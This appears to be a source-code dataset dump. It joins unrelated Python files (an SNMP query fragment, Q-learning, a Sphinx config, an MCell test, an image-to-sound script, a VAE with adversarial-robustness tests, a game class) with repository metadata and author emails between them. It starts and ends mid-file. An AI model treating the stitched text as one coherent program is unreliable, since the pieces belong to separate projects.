errorIndication, errorStatus, errorIndex, varBinds = next( getCmd(SnmpEngine(),CommunityData('uTdc9j48PBRkxn5DcSjchk', mpModel=0),UdpTransportTarget(('uTdc9j48PBRkxn5DcSjchk', 161)), ContextData(), ObjectType('.1.3.6.1.2.1.2.2.1'))
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind])) | [
"rakesh.helva@gmail.com"
] | rakesh.helva@gmail.com |
516373953da84479aba9b11e0bae3dbf7d26ccf5 | bb41814dc79f56a082a777e17ed31320db43edf4 | /reinforcement_learning/0x00-q_learning/4-play.py | d6b4d54e98814a6ad8799721a6031a8177cbde91 | [] | no_license | garimasinghgryffindor/holbertonschool-machine_learning | a92c619b6ad2d110ed97b33fa9903f5134c96866 | 856ee36006c2ff656877d592c2ddb7c941d63780 | refs/heads/master | 2023-08-01T09:58:13.863062 | 2020-11-28T00:50:55 | 2020-11-28T00:50:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | #!/usr/bin/env python3
"""
Has the trained agent play an episode
"""
import numpy as np
def play(env, Q, max_steps=100):
"""
Has the trained agent play an episode
:param env: is the FrozenLakeEnv instance
:param Q: is a numpy.ndarray containing the Q-table
:param max_steps: is the maximum number of steps in the episode
:return: the total rewards for the episode
"""
state = env.reset()
env.render()
for step in range(max_steps):
action = np.argmax(Q[state])
new_state, reward, done, info = env.step(action)
env.render()
if done:
return reward
state = new_state
env.close()
| [
"kenneth.ca95@gmail.com"
] | kenneth.ca95@gmail.com |
382df4a26d5fccd404d05e1cd04e27a56be1202a | 8cb9e6cb1e626c18952e6514dfeff267f1ca3f35 | /doc/conf.py | ebe3e0381c1f950adc1f0c230a7b003a8f609fd8 | [
"SHL-0.51",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rudyyao/zero-riscy | ec4cd86e2818dcf992ae13083f793acfaad102ac | 8c70fcf2b2de255d03cebc57cbc5939f57dd699e | refs/heads/master | 2020-04-01T13:02:22.239991 | 2018-12-04T05:42:20 | 2018-12-04T05:42:20 | 153,234,384 | 0 | 0 | NOASSERTION | 2018-12-04T05:42:21 | 2018-10-16T06:33:47 | SystemVerilog | UTF-8 | Python | false | false | 5,124 | py | # -*- coding: utf-8 -*-
#
# zero-riscy documentation build configuration file, created by
# sphinx-quickstart on Thu Nov 8 15:42:18 2018.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
numfig=True
numfig_format = {'figure': 'Figure %s', 'table': 'Table %s', 'code-block': 'Listing %s'}
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinxcontrib.wavedrom']
wavedrom_html_jsinline = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ZERO-RISCY'
copyright = u'2017-2018, ETH Zurich and University of Bologna'
author = u'Pasquale Davide Schiavone'
from setuptools_scm import get_version
release = get_version(root='..', relative_to=__file__)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
#release = u''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'venv']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
}
html_logo = 'images/pulp.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'zero-riscydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'zero-riscy.tex', u'ZERO-RISCY Documentation',
u'ETH Zurich and University of Bologna', 'manual'),
]
latex_logo = 'images/pulp_title.png'
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'zero-riscy', u'zero-riscy Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'zero-riscy', u'zero-riscy Documentation',
author, 'zero-riscy', 'One line description of project.',
'Miscellaneous'),
]
| [
"stefan@wallentowitz.de"
] | stefan@wallentowitz.de |
dd46d0c6385af0b92cb586eebf7cd3183305325b | 6394118fe656ead590e5ea8f390b77556ff70905 | /examples/macromols/invalid.py | 55199ba3e0612d53147f29178e1e6026c6d45b77 | [] | no_license | pdJeeves/MCell-Test-Framework | bcb6bc801dedfa3f954da5a0b4e38c14cb958d25 | a3b807ae5f5a6317854744eba1b845e58ef74b20 | refs/heads/master | 2020-12-24T13:52:34.364129 | 2014-05-02T14:23:28 | 2014-05-02T14:23:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | """
Macromolecule {parser} {'error handling'}
Author: {'Jed Wing'} <jed@salk.edu>
Date: {2008/04/04}
"""
for i in range(1, 40):
MCellTest("invalid-{0:02d}.mdl".format(i))
| [
"pdJeeves@zoho.com"
] | pdJeeves@zoho.com |
9a425b697c4550fd39bb3ac55fae5dffea1daf02 | 9cabe395035e3e344dcf0d83baa20bcdefec969e | /ITSC.py | 54425d2cbb84ee5b0ebf0805a648013f8d2c9844 | [] | no_license | dagomankle/LukeBox | 11703ab6ea0079e98649f41e23b5f780e33d3611 | 2b86167f2c3f6717194751f2e6ee605fb48858a2 | refs/heads/master | 2020-03-12T17:50:11.556813 | 2018-04-23T19:29:52 | 2018-04-23T19:29:52 | 130,737,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,280 | py | import cv2
import matplotlib.pyplot as plt
import numpy as np
import math
import pyaudio
import wave
def mostrarImagenInicialEstandard(nombre, x,y):
imagen = cv2.imread(nombre)
imagenStandard = cv2.resize(imagen, (x,y))
cv2.imshow("Imagen a Convertir",imagenStandard)
return imagenStandard
def obtenerMatricesBGR(imagenStandard, x,y):
b = np.zeros((y,x))
g = np.zeros((y,x))
r = np.zeros((y,x))
for n in list(range(y)):
for m in list(range(x)):
b[n][m] = ((imagenStandard[n][m])[0])
g[n][m] = ((imagenStandard[n][m])[1])
r[n][m] = ((imagenStandard[n][m])[2])
cv2.imwrite("recursosImg/rgb/blue.jpg", b)
cv2.imwrite("recursosImg/rgb/green.jpg", g)
cv2.imwrite("recursosImg/rgb/red.jpg", r)
bgr = [b,g,r]
return bgr
def obtenerPixelLbp(color, n, m):
exponente = 0
exponentes = [6,7,0,1,2,3,4,5]
pixelLpbB = 0
pixelLpbG = 0
pixelLpbR = 0
valorCentral0 = (color[0])[n][m]
valorCentral1 = (color[1])[n][m]
valorCentral2 = (color[2])[n][m]
for k in list(range(n-1,n+2)):
for j in list(range(m-1,m+2)):
if k != n and j != m:
if (color[0])[k][j] <= valorCentral0:
pixelLpbB = pixelLpbB + pow(2,exponentes[exponente])
if (color[1])[k][j] <= valorCentral1:
pixelLpbG = pixelLpbG + pow(2,exponentes[exponente])
if (color[2])[k][j] <= valorCentral2:
pixelLpbR = pixelLpbR + pow(2,exponentes[exponente])
exponente = exponente+1
return [pixelLpbB,pixelLpbB,pixelLpbR]
def obtenerColor(imagenStandard, n , m):
color =[ 0,0,0]
for k in list(range(n-1,n+2)):
for j in list(range(m-1,m+2)):
color[0] = color[0]+(imagenStandard[n][m])[0]
color[1] = color[1]+(imagenStandard[n][m])[1]
color[2] = color[2]+(imagenStandard[n][m])[2]
color = [int(color[0]/9),int(color[1]/9),int(color[2]/9)]
return color
def obtenerValoresConversion(imagenStandard,bgr,x,y, compresionNumber):
cn = 0
matOrigen= bgr
valoresConversion=[]
while cn <= compresionNumber:
puntosX = int((x-1)/3)
puntosY = int((y-1)/3)
lbpB = np.zeros((puntosY ,puntosX))
lbpG = np.zeros((puntosY ,puntosX))
lbpR = np.zeros((puntosY ,puntosX))
#colores = np.ndarray((puntosY ,puntosX))
colores = x = [[ [0,0,0] for i in range(puntosX)] for j in range(puntosY)]
if cn == compresionNumber:
lbpU = np.zeros((puntosY ,puntosX))
lbpF = np.zeros((puntosY ,puntosX))
canal = np.zeros((puntosY ,puntosX))
view = np.zeros((puntosY ,puntosX))
sonidoPorPixelI = np.zeros((puntosY ,puntosX))
sonidoPorPixelF = np.zeros((puntosY ,puntosX))
sonidoPorPixelM = np.zeros((puntosY ,puntosX))
for n in list(range(1,puntosY +1)):
for m in list(range(1,puntosX +1)):
o = 0
p = 0
if m != 1:
o = 3
if n != 1:
p = 3
lbpS = obtenerPixelLbp(matOrigen, n+p, m+o)
lbpB[n-1][m-1] = lbpS[0]
lbpG[n-1][m-1] = lbpS[1]
lbpR[n-1][m-1] = lbpS[2]
colores[n-1][m-1]= obtenerColor(imagenStandard,n+p,m+o)
if cn == compresionNumber:
d = colores[n-1][m-1]#revisar
lbpU[n-1][m-1] = lbpB[n-1][m-1] +lbpG[n-1][m-1] +lbpR[n-1][m-1]
lbpF[n-1][m-1] = lbpU[n-1][m-1] + d[0] + d[1]+ d[2]
view[n-1][m-1] = (lbpF[n-1][m-1]) *0.166
sonidoPorPixelI[n-1][m-1] = 40+9*lbpF[n-1][m-1]+lbpF[n-1][m-1]
sonidoPorPixelF[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +9
sonidoPorPixelM[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +4
print("testo")
print(d[0])
print(d[1])
print(d[2])
if d[0]> d[1] and d[0] > d[2]:
canal[n-1][m-1] = 0
elif d[2] > d[1] and d[2] > d[0]:
canal[n-1][m-1] = 2
else:
canal[n-1][m-1] = 1
print("canal")
print(canal[n-1][m-1])
print(canal)
valoresConversion = [lbpB,lbpG,lbpR, lbpU,lbpF, canal, sonidoPorPixelI, sonidoPorPixelF, sonidoPorPixelM, puntosX,puntosY]
matOrigen = [lbpB,lbpG,lbpR]
x = puntosX
y = puntosY
imagenStandard = colores
cn = cn+1
print(lbpF)
print("el toro")
print(lbpU)
cv2.imwrite("recursosImg/lpbs/lbpBC.jpg", lbpB)
cv2.imwrite("recursosImg/lpbs/lbpGC.jpg", lbpG)
cv2.imwrite("recursosImg/lpbs/lbpRC.jpg", lbpR)
cv2.imwrite("recursosImg/lpbs/lbpUC.jpg", lbpU)
cv2.imwrite("recursosImg/lpbs/lbpFC.jpg", lbpF)
cv2.imwrite("recursosImg/viewBWC.jpg", view)
return valoresConversion
def onda(frecuencia, duracion, rate=44100):
duracion = int(duracion * rate)
factor = float(frecuencia) * (math.pi * 2) / rate
return np.sin(np.arange(duracion) * factor)
def reproducir(stream, senial):
partes = []
partes.append(senial)
parte =np.concatenate(partes) * 0.25
stream.write(parte.astype(np.float32).tostring())
#if __name__ == '__main__':
def obtenerSonidoDeImagen(valoresConversion, numSeg):
sonidoF = []
print(valoresConversion[9])
print(valoresConversion[10])
sonidoPorPixelM = valoresConversion[8]
canal = valoresConversion[5]
print(canal)
cv2.waitKey(0)
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,channels=1, rate=44100, output=1)
for n in list(range(valoresConversion[10])):
for m in list(range(valoresConversion[9])):
print(n)
print(m)
print(sonidoPorPixelM[n][m])
print(canal[n][m])
senial = onda(sonidoPorPixelM[n][m],numSeg/(valoresConversion[9]*valoresConversion[10]))
senial2 = onda(40,numSeg/(valoresConversion[9]*valoresConversion[10]))
if canal[n][m] == 0 :
senial_stereo = np.ravel(np.column_stack((senial,senial2)))
elif canal[n][m] == 1:
senial_stereo = np.ravel(np.column_stack((senial,senial)))
else:
senial_stereo = np.ravel(np.column_stack((senial2,senial)))
reproducir(stream,senial_stereo )
stream.close()
p.terminate()
return sonidoF
def inicio(nombreImagen, numSeg, x, y,compresionNumber):
img = mostrarImagenInicialEstandard(nombreImagen, x,y)
bgr = obtenerMatricesBGR(img, x,y)
valoresConversion= obtenerValoresConversion(img,bgr,x,y,compresionNumber)
sonidoDeImagen = obtenerSonidoDeImagen(valoresConversion, numSeg)
cv2.waitKey(0)
#inicio("srcImagenes/carito.jpg", 60, 200,150, 3)
inicio("srcImagenes/escalaX.jpg", 15, 400,300, 2)
print("Graciassss TOTALES!!")
| [
"dagomankle@hotmail.com"
] | dagomankle@hotmail.com |
74bed4d0e8d1e82adc3e789bb419bd92b07ed34e | 3f73130d8072793b267bbcbb7ca45559c03d46cc | /lnets/models/architectures/VAE.py | 77c41d0505fbc188170712e30f70754942cf7612 | [] | no_license | FabianBarrett/Lipschitz_VAEs | 04935e9f9ea9e18ded6bed33bc717cc8b71743bc | 1aece7f16aa2baad5841aab2cd9f75a8c3733e13 | refs/heads/master | 2023-02-28T18:51:07.505336 | 2020-09-28T06:15:21 | 2020-09-28T06:15:21 | 286,734,094 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,828 | py | # BB: Implements the architecture of a VAE with a fully-connected encoder / decoder and diagonal Gaussian posterior
import torch
import torch.nn as nn
import torch.distributions as ds
import numpy as np
from lnets.models.layers import *
from lnets.models.utils import *
from lnets.models.architectures.base_architecture import Architecture
class fcMNISTVAE(Architecture):
def __init__(self, encoder_mean_layers, encoder_std_dev_layers, decoder_layers, input_dim, latent_dim, linear_type, activation, bias=True, config=None, dropout=False):
super(fcMNISTVAE, self).__init__()
self.config = config
# Store size of training set for loss computation purposes.
self.training_set_size = self.config.data.training_set_size
self.input_dim = input_dim
self.latent_dim = latent_dim
self.KL_beta = config.model.KL_beta if 'KL_beta' in config.model else None
self.encoder_mean_layer_sizes = encoder_mean_layers.copy()
self.encoder_mean_layer_sizes.insert(0, self.input_dim) # For bookkeeping purposes.
self.encoder_std_dev_layer_sizes = encoder_std_dev_layers.copy()
self.encoder_std_dev_layer_sizes.insert(0, self.input_dim) # For bookkeeping purposes.
self.decoder_layer_sizes = decoder_layers.copy()
self.decoder_layer_sizes.insert(0, self.latent_dim) # For bookkeeping purposes.
self.encoder_mean_l_constant = self.config.model.encoder_mean.l_constant
self.encoder_std_dev_l_constant = self.config.model.encoder_std_dev.l_constant
self.decoder_l_constant = self.config.model.decoder.l_constant
self.encoder_mean_num_layers = len(self.encoder_mean_layer_sizes)
self.encoder_std_dev_num_layers = len(self.encoder_std_dev_layer_sizes)
self.decoder_num_layers = len(self.decoder_layer_sizes)
self.gamma = config.model.encoder_std_dev.gamma if 'gamma' in config.model.encoder_std_dev else None
# Select activation function and grouping.
self.act_func = select_activation_function(activation)
if 'groupings' in self.config.model.encoder_mean:
self.encoder_mean_groupings = self.config.model.encoder_mean.groupings
self.encoder_mean_groupings.insert(0, -1) # For easier bookkeeping later on.
if 'groupings' in self.config.model.encoder_std_dev:
self.encoder_std_dev_groupings = self.config.model.encoder_std_dev.groupings
self.encoder_std_dev_groupings.insert(0, -1) # For easier bookkeeping later on.
if 'groupings' in self.config.model.decoder:
self.decoder_groupings = self.config.model.decoder.groupings
self.decoder_groupings.insert(0, -1) # For easier bookkeeping later on.
# Select linear layer type.
self.linear_type = linear_type
self.use_bias = bias
self.linear = select_linear_layer(self.linear_type)
encoder_mean_layers = self._get_sequential_layers(activation=activation,
l_constant_per_layer=self.encoder_mean_l_constant ** (1.0 / (self.encoder_mean_num_layers - 1)),
config=config, dropout=dropout, function='encoder_mean')
self.encoder_mean = nn.Sequential(*encoder_mean_layers)
encoder_std_dev_layers = self._get_sequential_layers(activation=activation,
l_constant_per_layer=self.encoder_std_dev_l_constant ** (1.0 / (self.encoder_std_dev_num_layers - 1)),
config=config, dropout=dropout, function='encoder_std_dev')
self.encoder_std_dev = nn.Sequential(*encoder_std_dev_layers)
decoder_layers = self._get_sequential_layers(activation=activation,
l_constant_per_layer=self.decoder_l_constant ** (1.0 / (self.decoder_num_layers - 1)),
config=config, dropout=dropout, function='decoder')
self.decoder = nn.Sequential(*decoder_layers)
self.standard_normal = ds.normal.Normal(torch.tensor(0.0), torch.tensor(1.0))
def forward(self, x):
x = x.view(-1, self.input_dim)
encoder_mean = self.encoder_mean(x)
if self.gamma is None:
encoder_std_dev = self.encoder_std_dev(x)
else:
encoder_std_dev = self.gamma * torch.ones(encoder_mean.shape)
z = encoder_mean + encoder_std_dev * self.standard_normal.sample(encoder_mean.shape)
return self.decoder(z), encoder_mean, encoder_std_dev
def _get_sequential_layers(self, activation, l_constant_per_layer, config, dropout=False, function=None):
# First linear transformation.
# Add layerwise output scaling to control the Lipschitz Constant of the whole network.
layers = list()
if dropout:
layers.append(nn.Dropout(0.2))
layers.append(self.linear(eval('self.' + function + '_layer_sizes')[0], eval('self.' + function + '_layer_sizes')[1], bias=self.use_bias, config=config))
layers.append(Scale(l_constant_per_layer, cuda=self.config.cuda))
for i in range(1, len(eval('self.' + function + '_layer_sizes')) - 1):
# Determine the downsampling that happens after each activation.
if activation == "maxout":
downsampling_factor = (1.0 / eval('self.' + function + '_groupings')[i])
elif activation == "maxmin" or activation == "norm_twist":
downsampling_factor = (2.0 / eval('self.' + function + '_groupings')[i])
else:
downsampling_factor = 1.0
# Add the activation function.
if activation in ["maxout", "maxmin", "group_sort", "norm_twist"]:
layers.append(self.act_func(eval('self.' + function + '_layer_sizes')[i] // eval('self.' + function + '_groupings')[i]))
else:
layers.append(self.act_func())
if dropout:
layers.append(nn.Dropout(0.5))
# Add the linear transformations.
layers.append(
self.linear(int(downsampling_factor * eval('self.' + function + '_layer_sizes')[i]), eval('self.' + function + '_layer_sizes')[i + 1], bias=self.use_bias,
config=config))
layers.append(Scale(l_constant_per_layer, cuda=self.config.cuda))
if function != 'encoder_mean':
layers.append(nn.Sigmoid())
if function == 'encoder_std_dev' and 'desired_radius' in config.model.encoder_std_dev:
# Constrains the encoder standard deviation norm such that certified robustness is met
max_norm = max((1.0 / np.sqrt(8)) * (config.model.encoder_std_dev.desired_radius / self.decoder_l_constant) - 1e-4, 0)
layers.append(Clip(max_norm, cuda=self.config.cuda))
return layers
def project_network_weights(self, proj_config):
# Project the weights on the manifold of orthonormal matrices.
for i, layer in enumerate(self.encoder_mean):
if hasattr(self.encoder_mean[i], 'project_weights'):
self.encoder_mean[i].project_weights(proj_config)
for i, layer in enumerate(self.encoder_std_dev):
if hasattr(self.encoder_std_dev[i], 'project_weights'):
self.encoder_std_dev[i].project_weights(proj_config)
for i, layer in enumerate(self.decoder):
if hasattr(self.decoder[i], 'project_weights'):
self.decoder[i].project_weights(proj_config)
def get_latents(self, x):
x = x.view(-1, self.input_dim)
encoder_mean = self.encoder_mean(x)
if self.gamma is None:
encoder_std_dev = self.encoder_std_dev(x)
else:
encoder_std_dev = self.gamma * torch.ones(encoder_mean.shape)
z = encoder_mean + encoder_std_dev * self.standard_normal.sample(encoder_mean.shape)
return z, encoder_mean, encoder_std_dev
# BB: Code taken but slightly adapted from Alex Camuto and Matthew Willetts
# Note: maximum_noise_norm defines maximum radius of ball induced by noise around datapoint
# If not "scale", then "clipping" (i.e. upper bound on norm rather than tight constraint)
def eval_max_damage_attack(self, x, noise, maximum_noise_norm, scale=False):
noise = torch.tensor(noise)
x = torch.tensor(x)
noise.requires_grad_(True)
x.requires_grad_(True)
if scale:
noise = maximum_noise_norm * noise.div(noise.norm(p=2))
else:
if noise.norm(p=2) > maximum_noise_norm:
noise = maximum_noise_norm * noise.div(noise.norm(p=2))
noisy_x = x.view(-1, self.input_dim) + noise.view(-1, self.input_dim)
original_reconstruction, _, _ = self.forward(x.view(-1, self.input_dim).float())
noisy_reconstruction, _, _ = self.forward(noisy_x.float())
# BB: Note this is the maximum damage objective
loss = -(noisy_reconstruction - original_reconstruction).norm(p=2)
gradient = torch.autograd.grad(loss, noise, retain_graph=True, create_graph=True)[0]
return loss, gradient
# BB: Code taken but adapted from Alex Camuto and Matthew Willetts
# Uses attack in Eq. 5 of https://arxiv.org/pdf/1806.04646.pdf
def eval_latent_space_attack(self, x, target_x, noise, soft=False, regularization_coefficient=None, maximum_noise_norm=None):
noise = torch.tensor(noise)
x = torch.tensor(x)
noise.requires_grad_(True)
x.requires_grad_(True)
if not soft:
if noise.norm(p=2) > maximum_noise_norm:
noise = maximum_noise_norm * noise.div(noise.norm(p=2))
noisy_x = x.view(-1, self.input_dim) + noise.view(-1, self.input_dim)
_, noisy_mean, noisy_std_dev = self.forward(noisy_x.float())
_, target_mean, target_std_dev = self.forward(target_x.view(-1, self.input_dim).float())
noisy_z_distribution = ds.multivariate_normal.MultivariateNormal(noisy_mean, noisy_std_dev.pow(2).squeeze().diag())
target_z_distribution = ds.multivariate_normal.MultivariateNormal(target_mean, target_std_dev.pow(2).squeeze().diag())
if soft:
loss = ds.kl.kl_divergence(noisy_z_distribution, target_z_distribution) + regularization_coefficient * noise.norm(p=2).sum()
else:
loss = ds.kl.kl_divergence(noisy_z_distribution, target_z_distribution)
gradient = torch.autograd.grad(loss, noise, retain_graph=True, create_graph=True)[0]
return loss, gradient
# BB: Not implemented for now (left until later / necessary)
def get_activations(self, x):
raise NotImplementedError | [
"fabianbarrett@college.harvard.edu"
] | fabianbarrett@college.harvard.edu |
90359ef949e323c83804ee217228a9b80a4fb08d | 6b8ac2b07f1077c4284d04a448d202bdbb3bc7b6 | /Viking.py | abdbe759385bf138ce9beba9db2f04af22895f53 | [] | no_license | GoatAndOwl/EntityFall-v2.2.0 | eef2dede1ac597dd487fde2760c68fdf94a83203 | 6af0c8bcff22476109d2db2ffe281538872b7e1b | refs/heads/master | 2020-04-10T18:08:24.682103 | 2018-12-10T15:20:15 | 2018-12-10T15:20:15 | 161,194,979 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,193 | py | from scene import *
from Classes import *
import Constants as ct
import random
class Viking(Entity):
def __init__(self, player):
Entity.__init__(self)
self.images = [['Images/Viking/VikingFace0-0.png', 'Images/Viking/VikingFace0-1.png',
'Images/Viking/VikingFace0-2.png'],
[None, None],
['Images/Viking/VikingFace2-1.PNG', 'Images/Viking/VikingFace2-2.PNG']]
self.IMG = SpriteNode(self.images[0][0])
self.IMG.anchor_point = (0, 1)
self.IMG.x_scale = 0.01*ct.CELL_X
self.IMG.y_scale = 0.01*ct.CELL_Y+0.15
self.IMG.position = (-250,-250)
self.IMG.z_position = 2.0
self.classSetup(player['abilities'], player['passives'])
self.targetedCells = None
self.name = 'Viking'
self.team = player['team']
self.stats = {'health': ct.VK_STATS['health'],
'MP': ct.VK_STATS['MP'],
'EP': ct.VK_STATS['EP'],
'orientation': None}
self.Startstats = {'health': ct.VK_STATS['health'],
'MP': ct.VK_STATS['MP'],
'EP': ct.VK_STATS['EP'],
'orientation': None}
def Ability1(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_1']['minRange'],
ct.VK_ABILITIES['ability_1']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_1']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_1']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_1':
x += 1
if lastCell in self.targetedCells and x < 2:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_1']['value'], False, True, 'ability_1')
self.stats['EP'] -= ct.VK_ABILITIES['ability_1']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_1']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_1', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_1')
self.effectsClean()
def Ability2(self, selectedcell, lastCell, game):
hit = False
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_2']['minRange'],
ct.VK_ABILITIES['ability_2']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif selectedcell and len(self.played_abilities) and self.Passive3 in self.passives:
if self.played_abilities[len(self.played_abilities)-1] \
== 'ability_1':
path = game.pathMultiplicator(selectedcell, self)
for cell in game.groundCells:
if path[1] == 'right' or path[1] == 'left':
if cell.coordX == selectedcell.coordX and \
(cell.coordY-1 == selectedcell.coordY or \
cell.coordY+1 == selectedcell.coordY):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
elif path[1] == 'top' or path[1] == 'bottom':
if cell.coordY == selectedcell.coordY and \
(cell.coordX-1 == selectedcell.coordX or \
cell.coordX+1 == selectedcell.coordX):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
for cell in self.zoneCells:
if selectedcell in self.targetedCells:
cell.cellType = 'SelectedCell'
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_2']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_2']['MPcost']:
if lastCell in self.targetedCells:
for entity in game.entityList:
for cell2 in self.zoneCells:
if entity.coordX == cell2.coordX and \
entity.coordY == cell2.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_2']['value'], False, False, 'ability_2')
hit = True
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_2']['value'], False, True, 'ability_2')
hit = True
if hit:
self.stats['EP'] -= ct.VK_ABILITIES['ability_2']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_2']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_2', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.zoneCells = []
self.played_abilities.append('ability_2')
self.effectsClean()
def Ability3(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_3']['minRange'],
ct.VK_ABILITIES['ability_3']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_3']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_3']['MPcost']:
for effect in self.effects:
if effect['name'] == 'charge':
x += 1
if lastCell in self.targetedCells:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
if x < 3:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_3']['value'], False, True, 'ability_3')
else:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_3']['value']*2, False, True, 'ability_3')
self.stats['EP'] -= ct.VK_ABILITIES['ability_3']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_3']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_3', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_3')
self.effectsClean()
def Ability4(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_4']['minRange'],
ct.VK_ABILITIES['ability_4']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_4']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_4']['MPcost']:
if lastCell in self.targetedCells:
for effect in self.effects:
